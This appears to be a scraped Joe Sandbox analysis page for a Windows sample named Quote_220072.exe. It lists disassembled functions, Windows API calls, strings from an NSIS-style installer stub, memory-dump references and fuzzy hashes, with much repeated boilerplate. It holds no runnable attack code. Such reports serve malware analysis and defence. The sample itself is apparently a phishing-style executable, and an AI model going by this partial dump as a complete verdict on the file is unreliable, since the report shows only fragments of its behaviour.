Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D

Non-executed Functions

Function 004062E4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
wsprintfA.USER32 ref: 00406363
GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
GlobalFree.KERNEL32(00000000), ref: 0040640D
CloseHandle.KERNEL32(00000000), ref: 00406414

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Strings

[Rename], xrefs: 004063C3, 004063D2
%ls=%ls, xrefs: 00406359

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C

Function 6FF82209 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302

GlobalFree.KERNEL32(00000000), ref: 6FF822F1
GlobalFree.KERNEL32(00000000), ref: 6FF82326

Strings

s<u, xrefs: 6FF822D0

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: Global$Free$Alloc
String ID: s<u
API String ID: 1780285237-779365171
Opcode ID: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
Instruction ID: 63cc8096b8e2e04cd55d6496d8c0e8f0a395b888bd882e68a68dd1d82578f38f
Opcode Fuzzy Hash: 33ed04a87e88edc3926e382e2b2097f827a8f4e74042a4088e5861bbec1b8f0c
Instruction Fuzzy Hash: F531E232114601EBEB258F68C958FBBB7B8FF47325B000269F431D62A0DB72A460DB61

Function 00406D1B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
*?|<>/":, xrefs: 00406D7F

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-776222514
Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9

Function 00405739 Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405756
GetSysColor.USER32 ref: 0040578F
SetTextColor.GDI32(?), ref: 004057A2
SetBkMode.GDI32(?,?), ref: 004057AE
GetSysColor.USER32(?), ref: 004057C2
SetBkColor.GDI32(?,?), ref: 004057D8
DeleteObject.GDI32(?), ref: 004057F4
CreateBrushIndirect.GDI32(?), ref: 004057FE

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28

Function 0040362D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
MulDiv.KERNEL32(00124660,00000064,00124660), ref: 00403673
wsprintfW.USER32 ref: 00403683
SetWindowTextW.USER32(?,?), ref: 00403693
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5

Strings

verifying installer: %d%%, xrefs: 0040367D

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C

Function 6FF810C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6FF8116B
GlobalFree.KERNEL32(00000000), ref: 6FF811AE
GlobalFree.KERNEL32(00000000), ref: 6FF811CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6FF811E6
GlobalFree.KERNEL32 ref: 6FF8125C
GlobalFree.KERNEL32(?), ref: 6FF812A7
GlobalFree.KERNEL32(00000000), ref: 6FF812BF

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
Instruction ID: a9c55cd3b43aab519c6e23a22b833c370c45884679d2246364a95b347d9fbef8
Opcode Fuzzy Hash: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
Instruction Fuzzy Hash: 3351B0725107029FCB10CF68D840AAA77B8FF4A324B14062AF975DB360E735E910CB91

Function 6FF81F1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 6FF81F51
lstrcpyW.KERNEL32(?,error,00001018,6FF81765,00000000,?), ref: 6FF81F71

Strings

callback%d, xrefs: 6FF81F4B
error, xrefs: 6FF81F67, 6FF81F6F
s<u, xrefs: 6FF81F51

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error$s<u
API String ID: 2408954437-3671815815
Opcode ID: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
Instruction ID: f4cac8586b14cb935a76d3bfc18b0729edd23c7970dc066855d7a720b102e69b
Opcode Fuzzy Hash: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
Instruction Fuzzy Hash: 96F01C35204110AFD7088B18D948EBB73B9FF8A314F0586A8F9799B311C774AC549B91

Function 6FF82049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FF821BF

Part of subcall function 6FF812E1: lstrcpynW.KERNEL32(00000000,?,6FF8156A,?,6FF811C4,-000000A0), ref: 6FF812F1

GlobalAlloc.KERNEL32(00000040), ref: 6FF8212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF8214C

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
Instruction ID: 3bd90ac4521c95a5520b4500b78554f18e6933d52fa9941e42d3f68046f79865
Opcode Fuzzy Hash: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
Instruction Fuzzy Hash: A541F372405B05EFC7009F68C944BEA7BB8FF06354B94033EE979DA289D7727590CAA0

Function 6FF81F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FF82B4C,00000000,00000808), ref: 6FF81F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FF81F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF81FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6FF81FB6
GlobalFree.KERNEL32(00000000), ref: 6FF81FBF

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
Instruction ID: 1426c93540283eff0f520808fc03329eb2d6bb3224e15093e3a8d5941e0f5cc6
Opcode Fuzzy Hash: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
Instruction Fuzzy Hash: D5F0C032118528BBCA101AE7DC0CE67BEBCFB8B6FAB160215F629D13B0D56268109771

Function 00406534 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
CharPrevW.USER32(?,00000000), ref: 00406545
lstrcatW.KERNEL32(?,004082B0), ref: 00406557

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406534

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED

Function 6FF81CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FF81D37
GlobalFree.KERNEL32(?), ref: 6FF81DF2
GlobalFree.KERNEL32(00000000), ref: 6FF81DF5
__alldvrm.LIBCMT ref: 6FF81E2F

Memory Dump Source

Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd

Similarity

API ID: FreeGlobal$__alldvrm
String ID:
API String ID: 482422042-0
Opcode ID: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
Instruction ID: b1a424f18152a33c41ba0db97387f50b6f2739dad30f1e9e4ffcc0c26ba8837b
Opcode Fuzzy Hash: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
Instruction Fuzzy Hash: 035107737483068B97149E798984ABA77F6BFCA714B104B2EF072C7350F7A1F9858252

Function 00403367 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00403378
GetTickCount.KERNEL32 ref: 00403397
CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
ShowWindow.USER32(00000000,00000005), ref: 004033C4

Memory Dump Source

Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
